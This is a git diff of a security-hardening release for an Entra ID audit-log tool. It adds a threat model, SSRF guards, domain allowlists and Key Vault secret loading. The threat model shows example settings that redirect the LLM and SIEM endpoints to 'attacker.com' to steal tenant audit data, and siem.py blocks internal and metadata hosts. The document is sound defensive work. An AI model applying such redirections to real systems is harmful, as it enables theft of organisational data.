diff --git a/.env.example b/.env.example index f4a0ee6..1e9f1e1 100644 --- a/.env.example +++ b/.env.example @@ -30,6 +30,15 @@ CORS_ORIGINS=* # OpenAPI docs exposure (set true only for dev) DOCS_ENABLED=false +# LLM endpoint domain restriction (comma-separated, supports wildcards like *.openai.azure.com) +# LLM_ALLOWED_DOMAINS=api.openai.com,*.openai.azure.com + +# SIEM webhook domain restriction (comma-separated) +# SIEM_ALLOWED_DOMAINS=your-siem.com + +# Optional Azure Key Vault for secrets storage +# AZURE_KEY_VAULT_NAME=your-keyvault-name + # Optional: SIEM export webhook (e.g., Splunk HEC, Sentinel, or generic syslog webhook) SIEM_ENABLED=false SIEM_WEBHOOK_URL= diff --git a/RELEASE_NOTES_v1.7.14.md b/RELEASE_NOTES_v1.7.14.md new file mode 100644 index 0000000..53c6bb0 --- /dev/null +++ b/RELEASE_NOTES_v1.7.14.md @@ -0,0 +1,64 @@ +# AOC v1.7.14 Release Notes + +**Release Date:** 2026-04-27 + +## Security Hardening: Threat Model Remediation + +This release addresses the high-severity findings from the v1.7.13 threat model review. + +### LLM Endpoint Domain Allowlist + +- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`) +- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist +- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint + +### SIEM Webhook SSRF Guard + +- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated) +- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist) +- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL + +### CDN Subresource Integrity (SRI) + +- Added `integrity` hashes to both CDN scripts in the frontend: + - Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be` + - MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW` +- **Impact:** Browser refuses to execute CDN scripts if the content doesn't match the hash, preventing supply chain compromise + +### Auth Misconfiguration Warning + +- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured +- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users + +### Azure Key Vault Integration (Optional) + +- **New module:** `backend/secrets_manager.py` +- **New config:** `AZURE_KEY_VAULT_NAME` +- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup: + - `aoc-client-secret` → `CLIENT_SECRET` + - `aoc-llm-api-key` → `LLM_API_KEY` + - `aoc-mongo-uri` → `MONGO_URI` + - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET` +- Falls back silently to `.env` / environment variables when Key Vault is not configured +- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in `requirements.txt` — uncomment when using Key Vault) +- **Impact:** Eliminates long-lived secrets from `.env` files and Docker images + +## Files Changed + +| File | Change | +|------|--------| +| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` | +| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL | +| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook | +| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js | +| `backend/main.py` | Startup warning for auth misconfiguration | +| `backend/secrets_manager.py` | New — Azure Key Vault integration | +| `backend/requirements.txt` | Added optional Azure Key Vault packages | +| `.env.example` | Documented new settings | +| `VERSION` | Bumped to 1.7.14 | +| `THREAT_MODEL_v1.7.13.md` | Threat model documentation | + +## Test Results + +- **80/80 pytest tests passing** +- Ruff lint/format clean diff --git a/THREAT_MODEL_v1.7.13.md b/THREAT_MODEL_v1.7.13.md new file mode 100644 index 0000000..2e08e32 --- /dev/null +++ b/THREAT_MODEL_v1.7.13.md @@ -0,0 +1,321 @@ +# AOC Threat Model — v1.7.13 + +**Date:** 2026-04-27 +**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies +**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false. + +--- + +## Attack Surface Map + +``` +┌─────────────────────────────────────────────────────────────────────────────┐ +│ ATTACKER │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │ +│ │ Frontend │ │ API │ │ Webhook │ │ +│ │ (CDN JS) │ │ (/api/*) │ │ (/api/webhooks)│ │ +│ └──────┬──────┘ └──────┬───────┘ └────────┬────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────────────────────────────────────────────────────┐ │ +│ │ AOC BACKEND │ │ +│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ Auth │ │ Events │ │ Fetch │ │ Ask/LLM │ │ │ +│ │ │ (JWT) │ │ (Mongo) │ │ (Graph) │ │ (HTTP) │ │ │ +│ │ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │ │ +│ │ │ │ │ │ │ │ +│ │ ▼ ▼ ▼ ▼ │ │ +│ │ ┌─────────────────────────────────────────────────────┐ │ │ +│ │ │ SECRETS / CREDENTIALS │ │ │ +│ │ │ CLIENT_SECRET │ LLM_API_KEY │ MONGO_PASSWORD │ │ │ +│ │ └─────────────────────────────────────────────────────┘ │ │ +│ └─────────────────────────────────────────────────────────────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────┐ ┌──────────────┐ ┌─────────────────┐ │ +│ │ Microsoft │ │ LLM API │ │ SIEM Webhook │ │ +│ │ Graph API │ │ (OpenAI/ │ │ (optional) │ │ +│ │ │ │ Azure) │ │ │ │ +│ └─────────────┘ └──────────────┘ └─────────────────┘ │ +└─────────────────────────────────────────────────────────────────────────────┘ +``` + +--- + +## 1. Entra App Registration Abuse — HIGH + +### 1.1 Client Credentials Leak = Full Tenant Read + +**How it works:** +- AOC uses `client_credentials` flow (`graph/auth.py`) +- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com` +- The token has `https://graph.microsoft.com/.default` scope +- This grants **all application permissions** configured in the Entra app registration + +**Typical permissions:** +- `Directory.Read.All` — read all users, groups, devices, roles +- `AuditLog.Read.All` — read all audit logs +- `DeviceManagementManagedDevices.Read.All` — read all Intune devices + +**Attack scenario:** +1. Attacker gains read access to `.env` or the Docker container filesystem +2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET` +3. Attacker receives a Graph API access token valid for ~1 hour +4. Attacker can query ALL tenant data independently of AOC + +**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if `Exchange.Read` granted). + +**Mitigation in place:** None. The backend needs these permissions to function. + +**Recommendation:** +- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env` +- Use short-lived certificates instead of long-lived secrets for app authentication +- Monitor Entra sign-in logs for anomalous `client_credentials` token requests +- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only) + +--- + +### 1.2 No Scope Restriction on Graph Token + +**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations. + +**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas. + +**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk. + +--- + +## 2. Authentication & Token Validation — MEDIUM + +### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening + +**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction. + +**Attack scenario (advanced):** +1. Attacker compromises DNS or a network hop between AOC and Microsoft +2. Attacker serves a fake JWKS endpoint with their own public key +3. Attacker issues a forged JWT signed with their private key +4. AOC validates the forged JWT against the attacker's public key +5. Attacker gains authenticated access + +**Likelihood:** Very low (requires DNS compromise or nation-state-level interception). + +**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint. + +--- + +### 2.2 Missing `nbf` / `iat` Claim Verification + +**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims. + +**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice. + +--- + +### 2.3 Role/Group Gating Defaults to "Allow All" + +**Finding:** In `auth.py`: +```python +def _allowed(claims, allowed_roles, allowed_groups): + if not allowed_roles and not allowed_groups: + return True +``` + +**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration. + +**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all. + +--- + +### 2.4 Privacy Service Role Gating Also Defaults to "Allow All" + +**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data. + +--- + +## 3. Data Exfiltration Paths — HIGH + +### 3.1 LLM Endpoint as Data Exfiltration Channel + +**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set: +- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API +- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist +- Any HTTPS URL is accepted + +**Attack scenario:** +1. Attacker gains `.env` write access (or container filesystem access) +2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm` +3. Attacker sends an `/api/ask` request like "show me all events" +4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL +5. Attacker receives structured audit data including actor names, UPNs, device names, operation details + +**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database. + +**Mitigation in place:** SSRF guard blocks private IPs and localhost. + +**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted. + +**Recommendation:** +- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`) +- Validate `LLM_BASE_URL` against this allowlist at startup and on every request +- Log all LLM requests with event counts sent + +--- + +### 3.2 SIEM Webhook as Real-Time Exfiltration Channel + +**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion: +```python +def forward_event(event): + if not SIEM_ENABLED or not SIEM_WEBHOOK_URL: + return + requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10) +``` + +**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard. + +**Attack scenario:** +1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect` +2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL +3. Attacker receives real-time stream of all tenant audit events + +**Impact:** Real-time, continuous data exfiltration of all audit events. + +**Recommendation:** +- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL` +- Add `SIEM_ALLOWED_DOMAINS` config +- Log SIEM forwarding failures prominently + +--- + +### 3.3 Export Features (JSON/CSV) + +**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`. + +**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit. + +**Risk level:** LOW — requires valid auth and is noisy. + +--- + +## 4. Webhook Abuse — MEDIUM + +### 4.1 Graph Change Notification Webhook + +**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications: +- Echoes `validationToken` for subscription handshake +- Accepts notifications with optional `clientState` validation +- `WEBHOOK_CLIENT_SECRET` is empty by default + +**Attack scenario 1 — Subscription hijacking:** +1. Attacker discovers the webhook URL (via API enumeration or guess) +2. Attacker creates a Graph subscription pointing to the AOC webhook URL +3. Attacker receives change notifications for the subscribed resource + +**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default. + +**Attack scenario 2 — Validation token abuse:** +1. Attacker sends a POST to `/api/webhooks/graph?validationToken=` +2. AOC echoes the token back as `text/plain` +3. Could be used for cache poisoning or response splitting + +**Mitigation:** Length and ASCII validation added in v1.7.12. + +**Recommendation:** +- Require `WEBHOOK_CLIENT_SECRET` to be set in production +- Document that the webhook endpoint should NOT be exposed to the public internet + +--- + +## 5. Supply Chain — MEDIUM + +### 5.1 CDN Scripts Without Subresource Integrity (SRI) + +**Finding:** The frontend loads two external scripts without SRI hashes: +```html + + +``` + +**Attack scenario:** +1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack) +2. Malicious JavaScript is served instead of the legitimate library +3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data + +**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing. + +**Recommendation:** +- Add SRI hashes to both script tags: + ```html + + ``` +- Or vendor the JS files and serve them from the same origin + +--- + +## 6. Privilege Escalation — MEDIUM + +### 6.1 Application Permissions Bypass User Boundaries + +**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in. + +**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if: +- `PRIVACY_SERVICES` is not configured, OR +- `PRIVACY_SERVICE_ROLES` is not configured + +**Recommendation:** +- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES` +- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target) + +--- + +## 7. Miscellaneous Vectors — LOW + +### 7.1 Token Cache in Memory + +**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly. + +**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`. + +### 7.2 MongoDB Connection String + +**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls. + +**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file). + +### 7.3 Audit Trail Log Injection + +**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS. + +**Risk level:** LOW — audit logs are not currently rendered in the UI. + +--- + +## Risk Summary + +| Vector | Severity | Likelihood | Requires | +|--------|----------|------------|----------| +| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access | +| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access | +| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access | +| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack | +| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration | +| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery | +| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise | +| Application permissions bypass boundaries | **MEDIUM** | High | Default config | +| Token replay | LOW | Low | Token theft | +| Audit log injection | LOW | Low | Filter manipulation | + +--- + +## Immediate Recommendations + +1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup +2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL` +3. **Add SRI hashes** to CDN script tags, or vendor the libraries +4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured +5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production +6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY` +7. **Add per-user filtering option** — restrict events to those involving the authenticated user diff --git a/VERSION b/VERSION index 36c5cb9..68ced4b 100644 --- a/VERSION +++ b/VERSION @@ -1 +1 @@ -1.7.13 +1.7.14 diff --git a/backend/config.py b/backend/config.py index bc8333c..30d42c3 100644 --- a/backend/config.py +++ b/backend/config.py @@ -1,4 +1,10 @@ -from pydantic_settings import BaseSettings, SettingsConfigDict +from secrets_manager import load_key_vault_secrets + +# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them. +# This is a no-op if AZURE_KEY_VAULT_NAME is not set. +load_key_vault_secrets() + +from pydantic_settings import BaseSettings, SettingsConfigDict # noqa: E402 class Settings(BaseSettings): @@ -80,6 +86,15 @@ class Settings(BaseSettings): DOCS_ENABLED: bool = False METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" + # LLM endpoint restriction (comma-separated domains, e.g. "api.openai.com,*.openai.azure.com") + LLM_ALLOWED_DOMAINS: str = "" + + # SIEM webhook restriction (comma-separated domains) + SIEM_ALLOWED_DOMAINS: str = "" + + # Optional Azure Key Vault integration for secrets + AZURE_KEY_VAULT_NAME: str = "" + _settings = Settings() @@ -134,3 +149,8 @@ RATE_LIMIT_WINDOW_SECONDS = _settings.RATE_LIMIT_WINDOW_SECONDS DOCS_ENABLED = _settings.DOCS_ENABLED METRICS_ALLOWED_IPS = _settings.METRICS_ALLOWED_IPS + +LLM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.LLM_ALLOWED_DOMAINS.split(",") if d.strip()] +SIEM_ALLOWED_DOMAINS = [d.strip().lower() for d in _settings.SIEM_ALLOWED_DOMAINS.split(",") if d.strip()] + +AZURE_KEY_VAULT_NAME = _settings.AZURE_KEY_VAULT_NAME diff --git a/backend/frontend/index.html b/backend/frontend/index.html index 05c131f..8b95074 100644 --- a/backend/frontend/index.html +++ b/backend/frontend/index.html @@ -5,8 +5,8 @@ Admin Operations Center - - + +
diff --git a/backend/main.py b/backend/main.py index 36a1b53..a980cae 100644 --- a/backend/main.py +++ b/backend/main.py @@ -10,6 +10,8 @@ import structlog from audit_trail import log_action from config import ( AI_FEATURES_ENABLED, + AUTH_ALLOWED_GROUPS, + AUTH_ALLOWED_ROLES, AUTH_ENABLED, CORS_ORIGINS, DOCS_ENABLED, @@ -275,6 +277,13 @@ async def start_periodic_fetch(): auth_enabled=AUTH_ENABLED, ai_enabled=AI_FEATURES_ENABLED, ) + # Warn when auth is enabled but no role/group restrictions are configured + if AUTH_ENABLED and not AUTH_ALLOWED_ROLES and not AUTH_ALLOWED_GROUPS: + logger.warning( + "AUTH_ENABLED is true but no AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS are configured. " + "Any Entra user in the tenant can authenticate and access AOC. " + "Set AUTH_ALLOWED_ROLES or AUTH_ALLOWED_GROUPS to restrict access." + ) if ENABLE_PERIODIC_FETCH: app.state.fetch_task = asyncio.create_task(_periodic_fetch()) diff --git a/backend/requirements.txt b/backend/requirements.txt index 0adcdf5..f3e1add 100644 --- a/backend/requirements.txt +++ b/backend/requirements.txt @@ -16,3 +16,8 @@ gunicorn mcp redis arq + +# Optional: Azure Key Vault integration for secrets storage +# Uncomment if using AZURE_KEY_VAULT_NAME +# azure-identity +# azure-keyvault-secrets diff --git a/backend/routes/ask.py b/backend/routes/ask.py index e48117e..f009d8b 100644 --- a/backend/routes/ask.py +++ b/backend/routes/ask.py @@ -7,6 +7,7 @@ import httpx import structlog from auth import require_auth, user_can_access_privacy_services from config import ( + LLM_ALLOWED_DOMAINS, LLM_API_KEY, LLM_API_VERSION, LLM_BASE_URL, @@ -398,7 +399,7 @@ def _format_events_for_llm( def _validate_llm_url(url: str): - """Prevent SSRF by rejecting internal/reserved addresses.""" + """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist.""" from urllib.parse import urlparse parsed = urlparse(url) @@ -420,6 +421,12 @@ def _validate_llm_url(url: str): except ValueError: pass # hostname is not an IP, which is fine + # Enforce domain allowlist if configured + if LLM_ALLOWED_DOMAINS: + allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in LLM_ALLOWED_DOMAINS) + if not allowed: + raise RuntimeError(f"LLM_BASE_URL domain '{hostname}' is not in LLM_ALLOWED_DOMAINS") + def _build_chat_url(base_url: str, api_version: str) -> str: base = base_url.rstrip("/") diff --git a/backend/secrets_manager.py b/backend/secrets_manager.py new file mode 100644 index 0000000..6a7488c --- /dev/null +++ b/backend/secrets_manager.py @@ -0,0 +1,76 @@ +"""Optional Azure Key Vault integration for secrets storage. + +If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from +Azure Key Vault at startup and injected into the environment so that +pydantic-settings can read them. Falls back to .env / environment variables +when Key Vault is not configured. + +Secret naming convention in Key Vault: + aoc-client-secret → CLIENT_SECRET + aoc-llm-api-key → LLM_API_KEY + aoc-mongo-uri → MONGO_URI + aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET +""" + +import os + +import structlog + +logger = structlog.get_logger("aoc.secrets") + +_KEY_VAULT_SECRET_MAP = { + "aoc-client-secret": "CLIENT_SECRET", + "aoc-llm-api-key": "LLM_API_KEY", + "aoc-mongo-uri": "MONGO_URI", + "aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET", +} + + +def _load_from_key_vault(vault_name: str) -> dict[str, str]: + """Fetch secrets from Azure Key Vault and return as {env_name: value}.""" + try: + from azure.identity import DefaultAzureCredential + from azure.keyvault.secrets import SecretClient + except ImportError as exc: + raise RuntimeError( + "Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets" + ) from exc + + vault_url = f"https://{vault_name}.vault.azure.net/" + credential = DefaultAzureCredential() + client = SecretClient(vault_url=vault_url, credential=credential) + + loaded = {} + for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items(): + try: + secret = client.get_secret(kv_name) + if secret.value: + loaded[env_name] = secret.value + logger.info("Loaded secret from Key Vault", secret_name=kv_name) + except Exception as exc: + logger.warning( + "Failed to load secret from Key Vault", + secret_name=kv_name, + error=str(exc), + ) + return loaded + + +def load_key_vault_secrets(vault_name: str | None = None): + """Load secrets from Azure Key Vault into os.environ if configured. + + This should be called BEFORE pydantic-settings parses configuration. + """ + vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "") + if not vault: + return + + logger.info("Loading secrets from Azure Key Vault", vault_name=vault) + secrets = _load_from_key_vault(vault) + for env_name, value in secrets.items(): + os.environ[env_name] = value + logger.info( + "Key Vault secrets loaded", + count=len(secrets), + keys=list(secrets.keys()), + ) diff --git a/backend/siem.py b/backend/siem.py index 2e41d27..36734d1 100644 --- a/backend/siem.py +++ b/backend/siem.py @@ -1,15 +1,43 @@ +import ipaddress + import requests import structlog -from config import SIEM_ENABLED, SIEM_WEBHOOK_URL +from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL logger = structlog.get_logger("aoc.siem") +def _validate_siem_url(url: str): + """Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist.""" + from urllib.parse import urlparse + + parsed = urlparse(url) + if parsed.scheme != "https": + raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS") + hostname = (parsed.hostname or "").lower() + if not hostname: + raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname") + blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"} + if hostname in blocked: + raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed") + try: + ip = ipaddress.ip_address(hostname) + if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved: + raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed") + except ValueError: + pass + if SIEM_ALLOWED_DOMAINS: + allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS) + if not allowed: + raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS") + + def forward_event(event: dict): """Forward a normalized event to the configured SIEM webhook.""" if not SIEM_ENABLED or not SIEM_WEBHOOK_URL: return try: + _validate_siem_url(SIEM_WEBHOOK_URL) res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10) res.raise_for_status() logger.debug("Event forwarded to SIEM", event_id=event.get("id"))